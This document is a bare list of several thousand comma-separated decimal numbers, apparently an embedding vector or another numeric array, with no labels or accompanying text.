0.026195675134658813, -0.020250139757990837, -0.012612187303602695, 0.03187631070613861, 0.0197939220815897, 0.013752729631960392, 0.026092657819390297, -0.019926372915506363, 0.031169909983873367, -0.004311984870582819, 0.003605584381148219, -0.001511218142695725, -0.001738406834192574, -0.01745397225022316, -0.008793211542069912, -0.006773347966372967, 0.02579832449555397, 0.005128759890794754, 0.018469423055648804, 0.007089756429195404, 0.004632072523236275, -0.022560657933354378, -0.025121357291936874, 0.003583509474992752, 0.012796145863831043, 0.036467909812927246, -0.004628393333405256, 0.013848387636244297, 0.011795411817729473, -0.0044444347731769085, 0.021898407489061356, 0.017086055129766464, -0.012590112164616585, -0.0539807491004467, -0.025636442005634308, 0.0029304572381079197, -0.026857925578951836, -0.009161127731204033, -0.0005757897743023932, 0.012391436845064163, 0.025886625051498413, -0.021736523136496544, -0.013811595737934113, -0.012987462803721428, -0.008962452411651611, 0.032347243279218674, -0.006718160584568977, -0.003947746939957142, 0.008072094060480595, -0.002143115270882845, -0.01195729523897171, 0.03793957829475403, 0.02849147655069828, 0.018042638897895813, -0.0024705613031983376, -0.0030426718294620514, -0.014319321140646935, 0.034230977296829224, -0.038734279572963715, 0.02749074250459671, 0.018616588786244392, 0.014422337524592876, 0.0012224034871906042, -0.011972011998295784, 0.032200075685977936, 0.017115488648414612, -0.006596747785806656, 0.0119352200999856, 0.015908721834421158, 0.029918992891907692, 0.002365704858675599, 0.019514305517077446, 0.017439255490899086, -0.008226619102060795, -0.03629131242632866, 0.0032192717771977186, 0.04523904621601105, 0.001450511859729886, -0.010198653675615788, 0.016129471361637115, -0.029242025688290596, -0.013362737372517586, 0.0030537093989551067, 0.017056621611118317, 0.02610737457871437, 0.0194554403424263, -0.006960985716432333, -0.006659293547272682, 0.024002891033887863, -0.005724784918129444, -0.027858659625053406, -0.024782873690128326, -0.032965343445539474, 0.0010660388506948948, 0.01440026331692934, -0.023473091423511505, 0.005415734834969044, 0.03278874233365059, 0.010757886804640293, -0.0019242047565057874, -0.018351688981056213, 0.025121357291936874, 0.006445901934057474, 0.007100793998688459, 0.025312675163149834, -0.0009455461404286325, -0.02095654048025608, 0.018233954906463623, -0.02014712244272232, 0.0006438543787226081, 0.0241794902831316, -0.02191312424838543, 0.03172914311289787, 0.008785853162407875, 0.016512105241417885, -0.02537154220044613, -0.007866060361266136, -0.013833670876920223, -0.0026526800356805325, -0.010397328063845634, -0.022384056821465492, -0.011111087165772915, 0.01406913809478283, -0.022236891090869904, -0.012612187303602695, -0.011972011998295784, -0.00485282251611352, 0.006725518964231014, -0.010389969684183598, -0.014930062927305698, -0.005095647647976875, -0.0030113989487290382, -0.002275565406307578, -0.013804237358272076, 0.01926412247121334, 0.001075236825272441, 0.009212636388838291, 0.012104461900889874, 0.005750539246946573, 0.0038999179378151894, -0.04103007912635803, -0.0008793211309239268, 0.020250139757990837, -0.015114021487534046, 0.03502567857503891, 0.011486361734569073, 0.01032374519854784, -0.024076474830508232, 0.007939644157886505, 0.030345777049660683, -0.03184687718749046, -0.019322989508509636, 0.0015056994743645191, -0.014444412663578987, 0.0000662250240566209, 0.006280339322984219, 0.011611453257501125, -0.0013990035513415933, -0.01381895411759615, 0.00885943602770567, 0.003910955507308245, 0.009889602661132812, -0.027623191475868225, -0.00790285225957632, -0.0025239090900868177, -0.029094859957695007, 0.009779227897524834, -0.010654870420694351, -0.0002373063180129975, 0.002356506884098053, -0.008888869546353817, -0.003811617847532034, 0.03125821053981781, -0.029815975576639175, -0.022943289950489998, -0.010706378147006035, 0.010882978327572346, -0.009448102675378323, 0.039852745831012726, 0.012884445488452911, -0.00874906126409769, 0.007601160556077957, 0.0018340651877224445, 0.00970564503222704, -0.015702689066529274, -0.012060312554240227, 0.009720361791551113, -0.0078439861536026, 0.034348711371421814, -0.009021319448947906, 0.0005845277919434011, 0.000652592396363616, 0.008123602718114853, 0.010831469669938087, -0.011501078493893147, 0.01668870449066162, 0.0028660716488957405, -0.007453993894159794, -0.005055176559835672, 0.01869017258286476, -0.018984505906701088, 0.00978658627718687, 0.005952893756330013, -0.021515773609280586, 0.042119111865758896, 0.01053713634610176, -0.010993353091180325, 0.012575395405292511, -0.01895507238805294, -0.044650379568338394, -0.001041204552166164, 0.001193889998830855, -0.011626170016825199, -0.013738012872636318, -0.001397163956426084, -0.01466516312211752, -0.028359025716781616, 0.00616996455937624, 0.004098592791706324, -0.028550341725349426, 0.015364204533398151, -0.034348711371421814, 0.011111087165772915, 0.02987484261393547, 0.017674721777439117, 0.02391459047794342, 0.009286219254136086, -0.018057355657219887, 0.015820421278476715, -0.021162573248147964, -0.012590112164616585, 0.015231754630804062, -0.014797613024711609, -0.004701976664364338, -0.02518022432923317, -0.008962452411651611, -0.030787276104092598, -0.0017641609301790595, 0.0003669970028568059, 0.005798368714749813, 0.004334059543907642, 0.0043083056807518005, -0.005246493499726057, -0.010279594920575619, -0.019852789118885994, -0.03040464222431183, -0.010618078522384167, -0.011574662290513515, 0.004315664060413837, 0.011883712373673916, -0.0008278127643279731, 0.013634995557367802, -0.024900607764720917, 0.01749812252819538, 0.012325212359428406, 0.030787276104092598, -0.00125183688942343, 0.006004401948302984, -0.014061779715120792, 0.009970544837415218, 0.00632448960095644, 0.0038741636089980602, 0.0028347987681627274, -0.031317077577114105, 0.03449587896466255, -0.012590112164616585, 0.009315652772784233, 0.030846143141388893, 0.013958762399852276, 0.007292110472917557, -0.013649712316691875, -0.00006777716771466658, -0.01857243850827217, -0.03908747807145119, -0.0009933753171935678, 0.006335527170449495, -0.0023601860739290714, -0.0023491487372666597, 0.008668119087815285, -0.005246493499726057, 0.017969055101275444, -0.008925661444664001, -0.021780673414468765, -0.02376742474734783, 0.026033790782094002, 0.00024236517492681742, 0.002555181970819831, 0.001060520182363689, -0.009830736555159092, -0.009124335832893848, -0.002612209180369973, 0.010831469669938087, -0.02575417421758175, -0.005500355735421181, 0.007373052183538675, 0.006582031026482582, -0.010993353091180325, 0.003324128221720457, 0.012369362637400627, 0.02088295668363571, -0.015496654435992241, -0.033701177686452866, 0.013428962789475918, 0.004569526296108961, 0.0031199343502521515, 0.004216326400637627, 0.0004796714929398149, -0.03184687718749046, 0.02537154220044613, -0.017851322889328003, 0.011096370406448841, -0.01264897920191288, -0.01845470629632473, 0.0030353134498000145, 0.00890358630567789, 0.01136127021163702, 0.04017651453614235, 0.0070934356190264225, 0.005452526733279228, 0.022781407460570335, -0.008042660541832447, -0.015467221848666668, 0.006368639413267374, 0.01780717261135578, 0.002126558916643262, -0.000474612636025995, 0.015982305631041527, -0.014120645821094513, 0.009529044851660728, -0.0020732111297547817, -0.027932241559028625, 0.03755694627761841, -0.023075740784406662, 0.04176591336727142, 0.0023473091423511505, 0.032347243279218674, 0.0017834765603765845, -0.018793189898133278, -0.01695360615849495, -0.03155254200100899, 0.004415001254528761, -0.002970928093418479, -0.000011389611245249398, 0.008910944685339928, -0.00885943602770567, -0.028962409123778343, -0.04306098073720932, 0.0197644904255867, -0.009470177814364433, 0.013907254673540592, -0.006147889420390129, 0.011876353994011879, 0.03225894272327423, 0.013428962789475918, 0.013164062052965164, 0.008108885958790779, -0.01960260607302189, 0.013789520598948002, 0.006409110501408577, -0.00857246108353138, -0.013318587094545364, -0.004540093243122101, -0.024665141478180885, 0.0005017464864067733, -0.000941866950597614, -0.008395860902965069, 0.01426045410335064, 0.003414267674088478, -0.01530533842742443, -0.007991152815520763, 0.003841051133349538, 0.0019701942801475525, -0.010809395462274551, 0.0015360525576397777, 0.006677689496427774, 0.009580552577972412, 0.022619523108005524, 0.0027832905761897564, -0.0013153024483472109, 0.015408354811370373, 0.011508436873555183, -0.0012242430821061134, 0.004212647210806608, 0.012575395405292511, -0.03290647640824318, 0.024002891033887863, -0.0028844675980508327, 0.013289154507219791, 0.008962452411651611, 0.0003460717271082103, -0.008336993865668774, -0.008918303065001965, -0.013303871266543865, 0.027461308985948563, -0.011479003354907036, 0.0025404654443264008, 0.007910210639238358, 0.013804237358272076, -0.01614418812096119, -0.00720013165846467, -0.01640908792614937, 0.004694618284702301, -0.01592343859374523, 0.014863838441669941, 0.004863860085606575, -0.002617727965116501, 0.020044106990098953, -0.008984527550637722, 0.02229575626552105, 0.0010743170278146863, 0.016659272834658623, 0.0005734902806580067, -0.0034437011927366257, -0.00544884754344821, 0.007270035799592733, -0.009985261596739292, 0.011295044794678688, 0.01733623817563057, 0.02295800670981407, 0.004981593228876591, 0.02467985823750496, 0.013370095752179623, -0.0009381878189742565, 0.003980859648436308, -0.005570259876549244, 0.014731387607753277, -0.002694990485906601, 0.022045573219656944, -0.00994111131876707, -0.0067880647256970406, 0.008999244309961796, 0.0020180235151201487, -0.015231754630804062, 0.0026913112960755825, -0.0062766601331532, -0.008292844519019127, 0.007630594074726105, 0.0074760690331459045, 0.011456928215920925, -0.003068425925448537, 0.014142720960080624, -0.019985239952802658, -0.01451063808053732, 0.00668872706592083, 0.015040437690913677, -0.008874152787029743, -0.020088257268071175, -0.016055887565016747, 0.01969090662896633, 0.02679905854165554, 0.005974968429654837, -0.01203087903559208, -0.007740969303995371, -0.006081664469093084, -0.008226619102060795, -0.00960998609662056, -0.015011005103588104, -0.00901396106928587, 0.0021946236956864595, 0.02725527435541153, -0.017777739092707634, 0.01326707936823368, -0.009992619976401329, 0.011030144989490509, -0.0004281631554476917, -0.005802047438919544, 0.013620279729366302, -0.0032928551081568003, -0.00805737730115652, -0.0018313057953491807, -0.0012720723170787096, -0.02832959219813347, 0.008322278037667274, 0.012877087108790874, -0.023061024025082588, -0.007652669213712215, -0.027005091309547424, -0.0020952860359102488, 0.01530533842742443, -0.01752755604684353, 0.0009639419731684029, -0.010721094906330109, 0.011758619919419289, -0.004812351427972317, -0.008925661444664001, 0.00885943602770567, 0.006644577253609896, -0.005169230978935957, 0.013355378992855549, 0.006960985716432333, -0.004374530632048845, 0.0006939830491319299, -0.026210391893982887, 0.0011350233107805252, 0.004304626490920782, -0.012236911803483963, 0.00511404313147068, -0.009116977453231812, -0.002746498677879572, -0.01428252924233675, -0.016850588843226433, 0.01826338842511177, -0.010161861777305603, 0.02460627444088459, 0.00970564503222704, -0.019161105155944824, -0.009948469698429108, -0.000664549705106765, -0.025827758014202118, 0.010132428258657455, -0.018395839259028435, -0.020824089646339417, -0.002395138144493103, 0.009904319420456886, 0.014047062955796719, -0.014466487802565098, 0.0012224034871906042, -0.0038336929865181446, -0.025430407375097275, -0.02453269064426422, -0.012442945502698421, -0.0020180235151201487, 0.01164824515581131, -0.004025009460747242, 0.0017006953712552786, -0.005169230978935957, -0.013428962789475918, -0.00420896802097559, 0.02022070623934269, 0.008807927370071411, 0.0027740926016122103, -0.02267839014530182, -0.013009537011384964, 0.01410592906177044, -0.01818980649113655, 0.0009004762978293002, -0.004006613977253437, -0.028359025716781616, -0.006136851850897074, 0.0014569504419341683, -0.00242641125805676, 0.0006254585459828377, -0.041883647441864014, 0.011692395433783531, 0.011081653647124767, 0.004466509912163019, 0.022634239867329597, 0.002275565406307578, -0.0015581275802105665, 0.007829269394278526, -0.008167752996087074, -0.00378218456171453, 0.002395138144493103, 0.008763778023421764, 0.030698975548148155, 0.013127271085977554, 0.01857243850827217, 0.0019260443514212966, 0.017630571499466896, -0.002343629952520132, 0.0005555543466471136, -0.004904330708086491, -0.012987462803721428, 0.002005146350711584, -0.006206755992025137, -0.005901385098695755, -0.005033101420849562, -0.0077483272179961205, -0.005290643312036991, 0.012722562067210674, -0.007601160556077957, -0.01888148859143257, 0.001837744377553463, 0.0031567260157316923, 0.01860187202692032, -0.003199036465957761, 0.024385524913668633, 0.006313452031463385, -0.00036216809530742466, -0.0022001422476023436, -0.011508436873555183, 0.004521697293967009, 0.00317696132697165, 0.010551853105425835, 0.002564379945397377, -0.012869728729128838, 0.011346553452312946, -0.0002761675277724862, 0.008050018921494484, -0.007799835875630379, 0.014701955020427704, 0.021088989451527596, 0.021059555932879448, -0.008947736583650112, 0.01001469511538744, -0.009102261625230312, 0.014459129422903061, -0.0015001806896179914, 0.005941856186836958, -0.011398062109947205, -0.004830747377127409, -0.01091977022588253, -0.008182468824088573, 0.00026719956076703966, -0.019131673499941826, 0.008653402328491211, -0.003789542941376567, -0.005816764198243618, -0.017704155296087265, -0.037350911647081375, 0.001791754737496376, -0.012685771100223064, -0.015658538788557053, -0.0016565453261137009, 0.0062876977026462555, 0.015982305631041527, -0.01543778833001852, -0.010080919601023197, -0.044238314032554626, -0.016732854768633842, 0.007777760736644268, -0.008123602718114853, -0.007119189947843552, 0.004017651081085205, -0.004576884675770998, 0.017012471333146095, 0.00828548613935709, -0.016924172639846802, 0.009433385916054249, 0.011066936887800694, 0.025047775357961655, 0.004128026310354471, -0.0062766601331532, 0.022943289950489998, 0.0009850971400737762, 0.006515806075185537, -0.008175111375749111, 0.0036846864968538284, 0.01038261130452156, -0.004838105756789446, -0.019426006823778152, 0.019058089703321457, -0.025194941088557243, -0.015967588871717453, 0.009396594949066639, -0.009587910957634449, -0.02248707413673401, 0.01005148608237505, -0.00030054201488383114, -0.010875619947910309, -0.01034582033753395, -0.02679905854165554, 0.0018322255928069353, 0.015820421278476715, 0.006530522834509611, 0.036114711314439774, 0.0015682452358305454, -0.000018122775145457126, 0.0045290556736290455, -0.00932301115244627, -0.017306804656982422, -0.010507703758776188, -0.008064735680818558, 0.03281817585229874, 0.0011920504039153457, 0.010882978327572346, -0.005110363941639662, 0.005246493499726057, 0.005699031054973602, -0.009948469698429108, 0.0005385382100939751, -0.017792455852031708, 0.0033774760086089373, -0.021162573248147964, 0.0063723186030983925, -0.01233992911875248, 0.014032346196472645, 0.016968322917819023, -0.004591601435095072, 0.0034473801497370005, -0.0053789434023201466, 0.00828548613935709, -0.016791721805930138, -0.006799102295190096, 0.019396573305130005, 0.022634239867329597, 0.003346203127875924, 0.007814552634954453, 0.004635751247406006, 0.008211902342736721, -0.013612921349704266, -0.034201543778181076, -0.01895507238805294, 0.012678412720561028, -0.005066214129328728, 0.02429722435772419, -0.02148634009063244, -0.01016922015696764, 0.0020952860359102488, 0.012406153604388237, -0.017851322889328003, 0.010772603563964367, -0.01512873824685812, 0.019234688952565193, -0.007501823361963034, -0.007163339760154486, 0.014098570682108402, 0.03814561292529106, -0.0014219983713701367, 0.003955105319619179, 0.019808638840913773, 0.008984527550637722, -0.008079452440142632, 0.011986728757619858, 0.01306840404868126, -0.010154503397643566, 0.0035191241186112165, -0.005338472314178944, -0.021236157044768333, -0.004418680444359779, 0.002626925939694047, -0.002770413411781192, -0.01988222263753414, -0.014120645821094513, -0.012751995585858822, 0.00187177665065974, -0.001167215988971293, 0.018484139814972878, 0.007384089753031731, 0.004293588921427727, 0.009999978356063366, 0.006769668776541948, 0.012818221002817154, -0.01580570451915264, 0.004713013768196106, -0.036497343331575394, 0.004543772432953119, 0.0011837722267955542, -0.015982305631041527, -0.012774070724844933, 0.024576840922236443, 0.02821185812354088, -0.01034582033753395, -0.0013612920884042978, 0.0021615109872072935, 0.0044885845854878426, -0.0028531947173178196, -0.0026287653017789125, -0.00661146454513073, -0.0022700466215610504, -0.005136118270456791, 0.01833697222173214, -0.01076524518430233, -0.024488540366292, 0.016482671722769737, 0.005544506013393402, -0.018425272777676582, -0.010640153661370277, 0.009771869517862797, -0.013002179563045502, -0.00740984408184886, -0.023634973913431168, 0.029242025688290596, -0.0059381769970059395, 0.0000056445046539010946, 0.02663717418909073, -0.00978658627718687, 0.007608518935739994, -0.016041170805692673, -0.0055555435828864574, -0.0059050642885267735, -0.009139052592217922, -0.014863838441669941, 0.005353189073503017, -0.000385622784961015, -0.01036053616553545, 0.006784385535866022, 0.016350222751498222, -0.0035246426705271006, -0.002924938453361392, -0.01324500422924757, -0.007888135500252247, 0.004116988740861416, 0.021192006766796112, 0.018042638897895813, 0.015378921292722225, -0.010367894545197487, 0.001879134913906455, -0.013811595737934113, -0.01032374519854784, -0.004926405847072601, -0.024282507598400116, -0.009205278009176254, -0.003382994793355465, 0.0020235422998666763, 0.010507703758776188, 0.006869006436318159, -0.006041193380951881, 0.011044861748814583, 0.006265623029321432, -0.004716692958027124, -0.034584175795316696, 0.011059578508138657, 0.012133895419538021, 0.021927841007709503, -0.002466882113367319, -0.010448836721479893, -0.01611475460231304, -0.022428207099437714, 0.01082411129027605, 0.0044959429651498795, 0.0022387735079973936, -0.00010410894901724532, -0.015967588871717453, 0.023164041340351105, -0.0025901340413838625, 0.02963937632739544, 0.0364384800195694, 0.012281062081456184, -0.0025993320159614086, -0.0008287325617857277, 0.0027060278225690126, 0.0010522420052438974, 0.007947002537548542, -0.010853544808924198, 0.013149346224963665, 0.032729875296354294, 0.006604106165468693, 0.022075006738305092, -0.00019591567979659885, -0.012008803896605968, 0.0022075006272643805, 0.026313409209251404, 0.013774804770946503, 0.03555547818541527, -0.005139797460287809, -0.00972772017121315, -0.0020456172060221434, -0.009793944656848907, -0.013590846210718155, -0.01826338842511177, -0.019941089674830437, 0.013627637177705765, 0.018248671665787697, -0.0005353189189918339, 0.006681368686258793, -0.0059381769970059395, 0.004816030617803335, -0.020588623359799385, 0.00901396106928587, -0.024400241672992706, -0.008763778023421764, -0.02625454217195511, -0.005279605742543936, -0.0018101505702361465, 0.024444391950964928, 0.017866039648652077, -0.025548141449689865, 0.009359803050756454, 0.018160372972488403, -0.00488225556910038, -0.024326657876372337, 0.010213369503617287, 0.003125453134998679, -0.012097103521227837, 0.000802518508862704, -0.012082386761903763, -0.015790987759828568, -0.009403953328728676, -0.0009289899026043713, 0.0022626882418990135, 0.0019389213994145393, -0.01014714501798153, 0.02083880640566349, -0.01082411129027605, -0.013620279729366302, -0.018013205379247665, -0.019779205322265625, -0.016556255519390106, -0.005522430874407291, -0.007281072903424501, 0.031935177743434906, -0.03311251103878021, -0.010559211485087872, -0.017233222723007202, 0.005139797460287809, 0.008314919658005238, 0.005654880777001381, -0.015614388510584831, -0.006471656262874603, -0.018086789175868034, -0.004974234849214554, -0.0032045552507042885, -0.011133162304759026, -0.004709335044026375, 0.01105222012847662, -0.019779205322265625, -0.020014673471450806, 0.013134629465639591, 0.013458396308124065, -0.003544878214597702, 0.0009933753171935678, -0.0012214836897328496, -0.015217037871479988, -0.01780717261135578, -0.0273288581520319, -0.012693128548562527, -0.022869708016514778, -0.011604094877839088, -0.0026526800356805325, 0.00436349306255579, 0.015290621668100357, -0.01995580643415451, -0.009352444671094418, -0.014834404923021793, 0.010250161401927471, 0.009985261596739292, 0.024547407403588295, -0.005923460237681866, 0.006158926989883184, -0.005654880777001381, 0.004418680444359779, -0.023428941145539284, -0.008005869574844837, -0.010117711499333382, -0.01618833839893341, -0.009514328092336655, 0.007557010743767023, 0.0004483985831029713, -0.0067034438252449036, 0.022251607850193977, 0.00028444567578844726, -0.014495921321213245, 0.02176595665514469, -0.002106323605403304, -0.019985239952802658, -0.0055481852032244205, 0.015114021487534046, 0.002089767251163721, -0.009874886833131313, 0.019131673499941826, 0.004036047030240297, 0.0032413469161838293, -0.00941867008805275, 0.009639419615268707, 0.008403219282627106, -0.04491528123617172, -0.023046307265758514, -0.024576840922236443, -0.0031512072309851646, -0.02398817427456379, -0.0025367862544953823, -0.010559211485087872, 0.02226632460951805, 0.007858702912926674, 0.0036736491601914167, 0.007991152815520763, 0.0038852011784911156, 0.008807927370071411, 0.0011423815740272403, -0.0013806077186018229, 0.010426761582493782, 0.0008526471210643649, 0.006512126885354519, -0.005816764198243618, -0.01038261130452156, 0.02587190829217434, -0.02317875809967518, 0.0026379632763564587, -0.0037858637515455484, -0.010404686443507671, -0.006854289676994085, 0.00467254314571619, -0.0021192007698118687, 0.010618078522384167, -0.009293577633798122, -0.022060289978981018, 0.007726252544671297, 0.0033664386719465256, 0.018675455823540688, 0.017159638926386833, -0.01003677025437355, 0.004271513782441616, -0.019985239952802658, -0.015658538788557053, -0.013392170891165733, 0.024488540366292, 0.019470155239105225, -0.0016096358885988593, -0.024002891033887863, -0.0068910811096429825, -0.01557023823261261, 0.029506925493478775, 0.0034933697897940874, 0.002786969533190131, -0.022354623302817345, -0.005540826823562384, 0.009904319420456886, -0.00828548613935709, -0.0060743060894310474, 0.002058494370430708, 0.013318587094545364, -0.010912411846220493, -0.012487095780670643, -0.0024356089998036623, 0.02725527435541153, -0.0037932221312075853, -0.002763055032119155, -0.005331114400178194, 0.006743914447724819, 0.013134629465639591, 0.018233954906463623, 0.025459840893745422, -0.007969077676534653, 0.021942557767033577, 0.014422337524592876, -0.011280328966677189, -0.00720748957246542, -0.009536403231322765, 0.006033835466951132, 0.005334793124347925, -0.0013033451978117228, -0.028844675049185753, -0.005960251670330763, -0.006449581123888493, 0.011066936887800694, 0.0052612097933888435, -0.016732854768633842, 0.01151579525321722, -0.004466509912163019, 0.00503678061068058, 0.0009013960952870548, -0.00010060224303742871, -0.013539337553083897, 0.004168496932834387, 0.005551864393055439, -0.016556255519390106, -0.0028991843573749065, -0.02029429003596306, 0.005540826823562384, 0.002878948813304305, -0.007509181741625071, -0.018999222666025162, 0.007453993894159794, -0.03455474600195885, 0.013340662233531475, -0.002198302885517478, -0.004628393333405256, -0.0012086066417396069, -0.01309047918766737, -0.011177311651408672, 0.02045617252588272, -0.018793189898133278, 0.00323950732126832, -0.034201543778181076, -0.006662972737103701, 0.03599697723984718, 0.008050018921494484, -0.009985261596739292, -0.00006082124309614301, -0.007523898035287857, -0.013752729631960392, 0.0028164030518382788, -0.007064002100378275, -0.007637952454388142, 0.018057355657219887, 0.0014468327863141894, -0.019705623388290405, 0.003973501268774271, -0.02122144028544426, -0.022119157016277313, 0.00844001118093729, 0.0185282900929451, -0.04303154721856117, -0.0019701942801475525, -0.005003668367862701, -0.01415007933974266, 0.008741702884435654, -0.008366427384316921, -0.019705623388290405, -0.0022240569815039635, 0.025400973856449127, 0.0041059511713683605, 0.005721106193959713, 0.011368628591299057, 0.016291355714201927, 0.004080197308212519, -0.00872698612511158, -0.013178778812289238, 0.0022148590069264174, 0.02129502408206463, -0.012737278826534748, -0.000018798247765516862, 0.012045595794916153, 0.005058855749666691, -0.017086055129766464, 0.023958740755915642, 0.005077251698821783, 0.029035992920398712, 0.009175844490528107, 0.0015719244256615639, -0.010750528424978256, 0.000698581978213042, 0.0012499972945079207, -0.015673255547881126, 0.014775537885725498, -0.000058981659094570205, 0.014363471418619156, -0.006607785355299711, 0.0040213302709162235, -0.021088989451527596, 0.007089756429195404, 0.003929351456463337, -0.012082386761903763, -0.010831469669938087, 0.004654147196561098, 0.022810840979218483, 0.009595269337296486, -0.010058844462037086, -0.010963920503854752, 0.006780706346035004, 0.026784341782331467, 0.011221461929380894, 0.013384812511503696, -0.006828535348176956, -0.013612921349704266, -0.012597470544278622, -0.012229553423821926, 0.0007280153222382069, 0.010868261568248272, 0.008528310805559158, 0.01409121323376894, 0.0029598905239254236, 0.009506969712674618, 0.01640908792614937, -0.0013327786000445485, 0.017895473167300224, -0.009771869517862797, 0.009977903217077255, -0.001515817129984498, 0.007623235695064068, 0.003955105319619179, 0.01138334535062313, -0.007571727503091097, -0.005334793124347925, -0.0013382972683757544, -0.0038336929865181446, -0.00910962000489235, -0.017115488648414612, -0.007064002100378275, 0.005743180867284536, -0.0025827758945524693, 0.015702689066529274, 0.013679145835340023, -0.01757170632481575, 0.018616588786244392, 0.01526118814945221, 0.0001763701147865504, -0.003574311500415206, 0.008660760708153248, -0.007682102266699076, 0.013583487831056118, -0.016217771917581558, -0.005095647647976875, -0.012428228743374348, -0.0012141254264861345, -0.00805737730115652, -0.004234722349792719, 0.025091923773288727, 0.010809395462274551, -0.003574311500415206, 0.011626170016825199, 0.024517973884940147, 0.0007795236888341606, 0.023164041340351105, 0.012178045697510242, -0.01688002236187458, 0.0033094114623963833, 0.013848387636244297, 0.005117722321301699, 0.0159970223903656, -0.017056621611118317, 0.019808638840913773, -0.004385568201541901, -0.0036166219506412745, 0.00960998609662056, -0.01738038845360279, -0.005529789254069328, 0.0041464222595095634, -0.011155236512422562, -0.0008830002625472844, 0.006559956353157759, -0.018896205350756645, 0.008123602718114853, 0.017468689009547234, 0.002746498677879572, -0.00947753619402647, 0.0017255296697840095, 0.0018193485448136926, 0.012509170919656754, 0.003818976227194071, -0.01838112249970436, -0.0024907966144382954, 0.0010154503397643566, 0.018793189898133278, -0.012457662262022495, -0.012317853979766369, -0.021692372858524323, 0.0025147111155092716, 0.006659293547272682, -0.00751653965562582, 0.005886668339371681, 0.02360554039478302, 0.0038999179378151894, 0.035849809646606445, 0.003136490471661091, 0.001554448390379548, -0.01680643856525421, 0.01764528825879097, -0.0011111086932942271, -0.030345777049660683, -0.0019278839463368058, 0.01576155424118042, -0.00041344648343510926, 0.011729187332093716, -0.011692395433783531, -0.01799848861992359, 0.009212636388838291, 0.0075275772251188755, 0.0007744648028165102, 0.01564382202923298, -0.00023983574646990746, 0.021383322775363922, 0.0019646757282316685, 0.013384812511503696, 0.011089012026786804, -0.004661505576223135, 0.006898439489305019, -0.004536414053291082, -0.00782191101461649, 0.0003472214739304036, 0.02406175807118416, -0.037851277738809586, 0.008241335861384869, -0.0011616972042247653, 0.018896205350756645, -0.014289887621998787, 0.0008296523592434824, 0.019587889313697815, -0.013340662233531475, -0.021883690729737282, -0.023428941145539284, -0.004988951608538628, 0.007523898035287857, 0.008123602718114853, 0.0159970223903656, -0.0004369011730886996, 0.004036047030240297, 0.021692372858524323, -0.013701220974326134, 0.007295789662748575, 0.0016841390170156956, -0.005588655825704336, -0.01459157932549715, -0.007281072903424501, 0.008763778023421764, -0.001401762943714857, -0.02214859053492546, -0.009212636388838291, -0.02179539017379284, 0.023708557710051537, 0.013370095752179623, 0.008329636417329311, -0.012465020641684532, -0.021353889256715775, 0.003515444928780198, -0.008226619102060795, 0.012928595766425133, -0.0008462085970677435, 0.017969055101275444, -0.006887402385473251, -0.010838828049600124, -0.009315652772784233, 0.007071360480040312, 0.017086055129766464, -0.005794689524918795, 0.0009556638542562723, -0.012788787484169006, -0.009676211513578892, 0.015114021487534046, 0.007755685597658157, 0.0023325923830270767, 0.029462775215506554, 0.005279605742543936, -0.012987462803721428, -0.0068395729176700115, -0.014444412663578987, -0.012560678645968437, -0.0007197372033260763, -0.0007648069877177477, -0.026710757985711098, 0.004466509912163019, -0.050919681787490845, 0.01699775457382202, -0.004389247391372919, -0.03437814489006996, 0.016438521444797516, -0.012994821183383465, -0.0012766711879521608, -0.010088277980685234, 0.018513573333621025, -0.004120667930692434, 0.015364204533398151, 0.004808672238141298, -0.02279612421989441, 0.01019129529595375, 0.011552587151527405, 0.0037564304657280445, 0.01680643856525421, -0.011471644975244999, -0.002494475804269314, -0.01058864500373602, -0.001079835812561214, -0.006464297883212566, 0.002740980125963688, -0.014326679520308971, -0.002877109218388796, -0.004448113963007927, 0.01497421320527792, -0.00025938134058378637, -0.008108885958790779, 0.01864602230489254, 0.014120645821094513, 0.003489690599963069, -0.0059676100499928, 0.024208923801779747, 0.002343629952520132, -0.00874906126409769, -0.020735789090394974, -0.0058130850084125996, 0.006596747785806656, -0.02506249211728573, -0.007303148042410612, 0.0002281084016431123, -0.004503301344811916, 0.0035963866394013166, -0.015334771946072578, 0.00041620584670454264, -0.0063723186030983925, -0.016732854768633842, 0.004087555687874556, -0.009396594949066639, 0.002748338272795081, 0.0036644511856138706, 0.008638686500489712, 0.0021799069363623857, 0.012045595794916153, 0.009205278009176254, -0.005934497807174921, 0.0001058335619745776, -0.010257519781589508, 0.013289154507219791, -0.004621034953743219, 0.005331114400178194, 0.0022902819328010082, 0.0026140487752854824, 0.022089723497629166, -0.02002939023077488, -0.01833697222173214, 0.023075740784406662, -0.006136851850897074, -0.017277373000979424, -0.00511404313147068, -0.013627637177705765, 0.02253122441470623, -0.0021946236956864595, 0.008646043948829174, -0.005478281062096357, 0.0056328061036765575, 0.012729920446872711, 0.022060289978981018, 0.0067108022049069405, 0.010654870420694351, -0.004871217999607325, 0.0013235806254670024, -0.003237667726352811, 0.018734322860836983, -0.0034087488893419504, 0.010757886804640293, 0.009838094934821129, -0.011545228771865368, 0.006306093651801348, -0.003830013796687126, -0.0020566547755151987, 0.010213369503617287, 0.0018313057953491807, -0.0003810238267760724, 0.012737278826534748, -0.011265612207353115, -0.0066261813044548035, 0.011015428230166435, 0.009639419615268707, 0.013620279729366302, 0.01512873824685812, 0.00970564503222704, 0.004002934787422419, -0.008579819463193417, 0.0058977059088647366, 0.004120667930692434, -0.0013980837538838387, -0.006206755992025137, -0.017969055101275444, 0.008763778023421764, 0.012163328938186169, 0.009278860874474049, -0.00910962000489235, 0.01518760435283184, -0.012178045697510242, -0.010110353119671345, -0.016055887565016747, -0.007932285778224468, -0.0041905720718204975, 0.005062534939497709, -0.010338461957871914, 0.023061024025082588, 0.014650446362793446, 0.012487095780670643, -0.009271502494812012, -0.005331114400178194, 0.011574662290513515, -0.006284018512815237, 0.013200853951275349, -0.019735056906938553, -0.023208189755678177, -0.028285441920161247, -0.0032119133975356817, 0.0007546892738901079, -0.009749794378876686, -0.007711535785347223, 0.005334793124347925, 0.0010936326580122113, 0.0000955433861236088, -0.017821889370679855, -0.007623235695064068, 0.034584175795316696, -0.010772603563964367, 0.006453260313719511, 0.007579085882753134, 0.01151579525321722, -0.028079409152269363, 0.014621012844145298, -0.007755685597658157, 0.026740191504359245, 0.005180268082767725, -0.020353157073259354, -0.00841793604195118, 0.00016797700664028525, 0.007038248237222433, -0.007969077676534653, 0.010529777966439724, -0.0008176950505003333, 0.023752707988023758, 0.021868973970413208, 0.0074429563246667385, -0.001021888921968639, 0.01295802928507328, -0.012229553423821926, 0.006736556068062782, -0.001029247185215354, -0.004459151532500982, 0.012369362637400627, 0.0038226554170250893, -0.010397328063845634, 0.011913144960999489, 0.0004838105814997107, 